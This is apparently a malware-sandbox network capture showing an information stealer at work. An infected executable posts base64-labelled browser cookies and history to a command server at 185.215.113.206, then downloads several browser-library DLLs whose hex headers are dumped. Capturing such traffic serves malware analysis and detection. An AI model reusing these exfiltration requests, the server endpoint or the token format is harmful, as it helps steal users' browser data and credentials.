                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.375015020 CET25956OUTData Raw: 14 f4 0f 25 bb f2 1b 82 ee fa b5 a8 44 43 d1 91 3e e1 3b e2 15 53 7e 2b 08 39 6f 55 bd 9c 54 40 92 83 a6 37 5b 1b cc 26 7f fc 7f cc df 5f b6 7a 7c 4e a8 d1 19 22 d4 80 ef 06 67 44 5c b7 05 9b a3 1b 4c f9 12 87 8f 0c 6b 09 86 11 ab d3 f4 fa 56 ad
                                                                                                                                                                                                                                                                                                            Data Ascii: %DC>;S~+9oUT@7[&_z|N"gD\LkV8RDs?RO-iv~P"#2&V9\vS]alG}RsF7zI%ak^ipnw]@OEMB{7+%+<{"f!1~@2 3Y8ZDlE(
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:55.843905926 CET190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            date: Thu, 21 Nov 2024 11:10:55 GMT
                                                                                                                                                                                                                                                                                                            content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                                                                                                                            etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                                                                            Data Raw: 4f 4b
                                                                                                                                                                                                                                                                                                            Data Ascii: OK


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            15192.168.2.449916185.215.113.206807920C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:57.014097929 CET629OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKF
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: ------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------JJKFBAKFBGDHIEBGDAKF--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:58.909362078 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:58 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:59.043795109 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGCBKECAKFBGCAKECGIE
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 1451
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:59.043849945 CET1451OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36
                                                                                                                                                                                                                                                                                                            Data Ascii: ------DGCBKECAKFBGCAKECGIEContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------DGCBKECAKFBGCAKECGIEContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:59.992590904 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:59 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.051702976 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJE
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 363
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: ------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="file"------IJDGCAEBFIIECAKFHIJE--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:01.002660990 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:00 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:02.499646902 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 363
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: ------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file"------BFCFBKKKFHCFHJKFIIEH--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:03.446204901 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:02 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.251291037 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.702238083 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:04 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                            ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Content-Length: 685392
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.702306986 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                                                                            Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.702341080 CET448INData Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff
                                                                                                                                                                                                                                                                                                            Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh|$,}uT$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.702377081 CET1236INData Raw: 07 00 74 10 8b 5c 24 28 e9 a7 00 00 00 0f 1f 80 00 00 00 00 8b 44 24 08 80 ec 01 8b 5c 24 28 73 46 8b 44 24 0c 2c 01 89 44 24 0c 73 40 8b 44 24 10 2c 01 89 44 24 10 73 3c 8b 44 24 14 2c 01 73 42 8b 44 24 18 2c 01 73 40 8b 44 24 20 2c 01 89 44 24
                                                                                                                                                                                                                                                                                                            Data Ascii: t\$(D$\$(sFD$,D$s@D$,D$s<D$,sBD$,s@D$ ,D$ D$$D$$D$(D$GD$?D$D$1D$L$D$D$D$D$f.DD$HjD$DPjL$HQPt$@mbD$HD$
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.702410936 CET1236INData Raw: ca 74 2f 8b 45 10 8b 55 d0 89 10 b9 03 e0 ff ff 3b 55 14 8b 5d d4 77 22 31 ff 8b 45 0c 39 c6 74 3a 52 56 50 e8 20 01 08 00 eb 2d bf ff ff ff ff eb 3a b9 02 e0 ff ff 8b 5d d4 51 e8 73 00 08 00 83 c4 04 bf ff ff ff ff 8b 45 0c 39 c6 75 0c 53 6a 00
                                                                                                                                                                                                                                                                                                            Data Ascii: t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjShjVPt^_[]^_[]USWV}tVEGGH
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.702444077 CET448INData Raw: c4 0c eb 25 85 ff 74 15 89 c8 89 f1 89 d6 8b 55 10 56 50 e8 64 fc ff ff 83 c4 10 eb 6e 8d 46 08 89 45 ec 8b 46 08 89 45 f0 c7 46 08 00 00 00 00 89 5e 04 8b 4b 04 ff 15 00 80 0a 10 ff d1 89 06 bb ff ff ff ff 85 c0 74 3d 89 f1 8b 55 10 ff 75 18 ff
                                                                                                                                                                                                                                                                                                            Data Ascii: %tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]USWVu}E@H
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.703819990 CET1236INData Raw: 10 ff 75 14 ff 75 10 53 56 ff d1 83 c4 10 31 c0 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 50 68 0c 01 00 00 e8 fe f9 07 00 83 c4 04 31 ff 85 c0 74 71 89 c6 8b 5d 08 c7 40 08 01 00 00 00 8b 43 04 89 46 04 8b 03 89 45 f0 8b 43 04 8b 48
                                                                                                                                                                                                                                                                                                            Data Ascii: uuSV1^_[]USWVPh1tq]@CFECHut7FKSrQP;KqSPVi^_[]UhV1]Uh6]
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.703995943 CET1236INData Raw: 83 fe 02 0f 84 e8 00 00 00 8b 45 ec 04 03 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 02 32 14 0f 8b 4d e4 88 51 02 83 fe 03 0f 84 ac 00 00 00 8b 45 ec 04 04 0f b6 c8 8b 7d f0 8a 14
                                                                                                                                                                                                                                                                                                            Data Ascii: E}$7$7u]S2MQE}$7$7u]S2MQttE}$7$7u]S2MQt<E}$7$7u]S2]S
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.712239981 CET1236INData Raw: d2 f6 c2 01 0f 84 9b 00 00 00 66 0f 6f 1d d0 20 08 10 66 0f fe d8 0b 75 cc 8b 45 10 66 0f 6e 2c 30 66 0f 6e 64 30 04 66 0f ef f6 66 0f 60 ee 66 0f 61 ee 66 0f 60 e6 66 0f 61 e6 66 0f 72 f0 17 66 0f 6f 35 e0 20 08 10 66 0f fe c6 f3 0f 5b c0 66 0f
                                                                                                                                                                                                                                                                                                            Data Ascii: fo fuEfn,0fnd0ff`faf`fafrfo5 f[fpffpfpffpfbffrf[fpffpfpffpfbfffpffpUff~MU9UEuUM}]?uu]}
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:04.712373018 CET1236INData Raw: 07 88 0c 37 00 cd 8b 45 10 8a 40 06 0f b6 cd 32 04 0f 88 43 06 8b 4d ec e9 2e f7 ff ff cc cc cc 55 89 e5 53 57 56 81 ec 5c 01 00 00 89 8d dc fe ff ff 8b 32 89 95 74 ff ff ff 89 b5 f4 fe ff ff 8b 01 89 85 9c fe ff ff 89 c7 01 f7 8b 52 04 89 95 f8
                                                                                                                                                                                                                                                                                                            Data Ascii: 7E@2CM.USWV\2tRAA q$]QD1A@1RQP5}gjM31tQIU]U1P
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:06.302472115 CET94OUTGET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:06.753401995 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:06 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                            ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Content-Length: 608080
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:07.750650883 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:08.202065945 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:07 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                            ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Content-Length: 450024
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:09.009697914 CET91OUTGET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:09.461167097 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:09 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                            ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Content-Length: 2046288
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
